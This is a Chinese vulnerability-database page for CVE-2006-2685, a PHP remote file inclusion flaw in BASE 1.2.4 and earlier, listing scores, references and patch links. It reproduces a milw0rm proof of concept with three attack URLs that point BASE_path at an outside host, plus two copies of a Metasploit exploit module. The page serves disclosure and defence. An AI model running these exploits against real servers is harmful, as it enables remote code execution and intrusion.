CVE-2006-2685
CVSS4.0
发布时间 :2006-05-31 06:06:00
修订时间 :2011-08-23 00:00:00
NMCOEP    

[原文]PHP remote file inclusion vulnerability in Basic Analysis and Security Engine (BASE) 1.2.4 and earlier, with register_globals enabled, allows remote attackers to execute arbitrary PHP code via a URL in the BASE_path parameter to (1) base_qry_common.php, (2) base_stat_common.php, and (3) includes/base_include.inc.php.


[CNNVD]Basic Analysis/Security Engine 多个远程文件包含漏洞(CNNVD-200605-548)

        Basic Analysis 和 Security Engine (BASE) 1.2.4及之前版本存在PHP远程文件包含漏洞。远程攻击者可以借助对(1) base_qry_common.php,(2) base_stat_common.php和(3)includes/base_include.inc.php的BASE_path参数中的URL,执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 4 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-94 [对生成代码的控制不恰当(代码注入)]

- CPE (受影响的平台与产品)

cpe:/a:kevin_johnson:basic_analysis_and_security_engine:1.2.0
cpe:/a:kevin_johnson:basic_analysis_and_security_engine:1.2.4
cpe:/a:kevin_johnson:basic_analysis_and_security_engine:1.2.2
cpe:/a:kevin_johnson:basic_analysis_and_security_engine:1.2.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2685
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2685
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-548
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/18298
(PATCH)  BID  18298
http://xforce.iss.net/xforce/xfdb/26652
(UNKNOWN)  XF  base-path-file-include(26652)
http://www.vupen.com/english/advisories/2006/1996
(VENDOR_ADVISORY)  VUPEN  ADV-2006-1996
http://www.osvdb.org/25770
(UNKNOWN)  OSVDB  25770
http://sourceforge.net/forum/forum.php?forum_id=577228
(UNKNOWN)  CONFIRM  http://sourceforge.net/forum/forum.php?forum_id=577228
http://secunia.com/advisories/20300
(VENDOR_ADVISORY)  SECUNIA  20300
http://milw0rm.com/exploits/1823
(UNKNOWN)  MILW0RM  1823
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=370576
(UNKNOWN)  CONFIRM  http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=370576

- 漏洞信息

Basic Analysis/Security Engine 多个远程文件包含漏洞
中危 代码注入
2006-05-31 00:00:00 2006-06-12 00:00:00
远程  
        Basic Analysis 和 Security Engine (BASE) 1.2.4及之前版本存在PHP远程文件包含漏洞。远程攻击者可以借助对(1) base_qry_common.php,(2) base_stat_common.php和(3)includes/base_include.inc.php的BASE_path参数中的URL,执行任意PHP代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        BASE Basic Analysis and Security Engine 1.2
        BASE base-1.2.5.tar.gz
        http://prdownloads.sourceforge.net/secureideas/base-1.2.5.tar.gz?download
        BASE Basic Analysis and Security Engine 1.2.1
        BASE base-1.2.5.tar.gz
        http://prdownloads.sourceforge.net/secureideas/base-1.2.5.tar.gz?download
        BASE Basic Analysis and Security Engine 1.2.2
        BASE base-1.2.5.tar.gz
        http://prdownloads.sourceforge.net/secureideas/base-1.2.5.tar.gz?download
        BASE Basic Analysis and Security Engine 1.2.4
        BASE base-1.2.5.tar.gz
        http://prdownloads.sourceforge.net/secureideas/base-1.2.5.tar.gz?download

- 漏洞信息 (1823)

BASE <= 1.2.4 melissa (Snort Frontend) Remote Inclusion Vulnerabilities (EDBID:1823)
php webapps
2006-05-25 Verified
0 str0ke
N/A [点击下载]
# Basic Analysis and Security Engine (BASE) <= 1.2.4 (melissa) Inclusion Vulnerabilities
#   Just glanced over BASE for a pentesting job. /str0ke ! milw0rm.com
##################################

[code (base_qry_common.php)]
   include_once("$BASE_path/includes/base_signature.inc.php");
[/code]

http://[site]/snort/base_qry_common.php?BASE_path=http://www.milw0rm.com/index.php?&

########################################

[code (base_stat_common.php)]
   include_once("$BASE_path/includes/base_constants.inc.php");
[/code]

http://[site]/snort/base_stat_common.php?BASE_path=http://www.milw0rm.com/index.php?&

###############################################

[code (includes/base_include.inc.php)]
   include_once("$BASE_path/includes/base_db.inc.php");
   include_once("$BASE_path/includes/base_output_html.inc.php");
   include_once("$BASE_path/includes/base_state_common.inc.php");
   ...
[/code]

http://[site]/snort/includes/base_include.inc.php?BASE_path=http://www.milw0rm.com/index.php?&

#######################################################

# milw0rm.com [2006-05-25]
		

- 漏洞信息 (16897)

BASE base_qry_common Remote File Include (EDBID:16897)
php webapps
2010-11-24 Verified
0 metasploit
[点击下载] [点击下载]
##
# $Id: base_qry_common.rb 11127 2010-11-24 19:35:38Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::HttpServer::PHPInclude

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'BASE base_qry_common Remote File Include',
			'Description'    => %q{
					This module exploits a remote file inclusion vulnerability in
				the base_qry_common.php file in BASE 1.2.4 and earlier.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11127 $',
			'References'     =>
				[
					[ 'CVE', '2006-2685' ],
					[ 'OSVDB', '49366'],
					[ 'BID', '18298' ],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Compat'      =>
						{
							'ConnectionType' => 'find',
						},
					'Space'       => 32768,
				},
			'Platform'       => 'php',
			'Arch'           => ARCH_PHP,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Jun 14 2008',
			'DefaultTarget' => 0))

		register_options(
			[
				OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/base/base_qry_common.php?BASE_path=!URL!"]),
			], self.class)
	end

	def php_exploit

		timeout = 0.01
		uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
		print_status("Trying uri #{uri}")

		response = send_request_raw( {
				'global' => true,
				'uri' => uri,
			},timeout)

		if response and response.code != 200
			print_error("Server returned non-200 status code (#{response.code})")
		end

		handler
	end

end
		

- 漏洞信息 (F82354)

BASE base_qry_common Remote File Include (PacketStormID:F82354)
2009-10-30 00:00:00
MC  
exploit,remote,php,file inclusion
CVE-2006-2685
[点击下载]

This Metasploit module exploits a remote file inclusion vulnerability in the base_qry_common.php file in BASE 1.2.4 and earlier.

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::HttpServer::PHPInclude

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'BASE base_qry_common Remote File Include.',
			'Description'    => %q{
					This module exploits a remote file inclusion vulnerability in
					the base_qry_common.php file in BASE 1.2.4 and earlier.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision:$',
			'References'     =>
				[
					[ 'CVE', '2006-2685' ],
					[ 'BID', '18298' ],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Compat'      => 
						{
							'ConnectionType' => 'find',
						},
					'Space'       => 32768,
				},
			'Platform'       => 'php',
			'Arch'           => ARCH_PHP,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Jun 14 2008',
			'DefaultTarget' => 0))
			
			register_options(
				[
					OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/base/base_qry_common.php?BASE_path=!URL!"]),
				], self.class)
	end

	def php_exploit

		timeout = 0.01
		uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
		print_status("Trying uri #{uri}")

		response = send_request_raw( {
				'global' => true,
				'uri' => uri,
			},timeout)

		if response and response.code != 200
			print_error("Server returned non-200 status code (#{response.code})")
		end
		
		handler
	end

end

    

- 漏洞信息

25770
Basic Analysis and Security Engine (BASE) includes/base_include.inc.php BASE_path Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- 漏洞描述

Basic Analysis and Security Engine (BASE) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to "includes/base_include.inc.php" not properly sanitizing user input supplied to the "BASE_path" variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-05-25 Unknow
2006-05-25 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站